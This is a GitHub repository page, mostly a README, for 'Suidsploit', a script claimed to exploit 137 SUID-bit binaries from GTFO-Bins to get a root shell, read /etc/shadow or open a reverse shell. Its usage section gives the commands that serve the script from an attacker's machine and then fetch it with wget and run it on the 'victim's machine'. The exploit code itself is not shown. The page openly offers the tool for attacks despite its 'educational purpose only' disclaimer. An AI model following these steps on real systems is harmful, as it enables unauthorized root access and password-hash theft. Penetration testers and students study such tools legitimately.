Skip to content

S1lkys/Suidsploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Suidsploit by Tizun & Silky

Build Status

Suidsploit is a Tool which can exploit 137 files from GTFO-Bins where the Suidbit is set. On successful exploitation you can gain:

  • Root Shell
  • Output of /etc/shadow
  • Reverse shell

alt text

Usage:

Open your favorite Terminal and run these commands. On your machine:

  • Download Suidsploit
  • Start a HTTP-Server

$ git clone https://github.com/S1lkys/Suidsploit.git

$ cd Suidsploit/

$ python -m SimpleHTTPServer 80

On victims machine:

  • download Suidsploit
  • make it executable
  • execute Suidsploit

$ wget http://192.168.xxx.xxx/Suidsploit.sh

$ chmod +x Suidsploit.sh

$ bash Suidsploit.sh

Todos

  • Fix found Bugs
  • Add new Tools

License

For educational Purpose only!

About

A Tool which can exploit 137 files from GTFO-Bins automaticlly

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages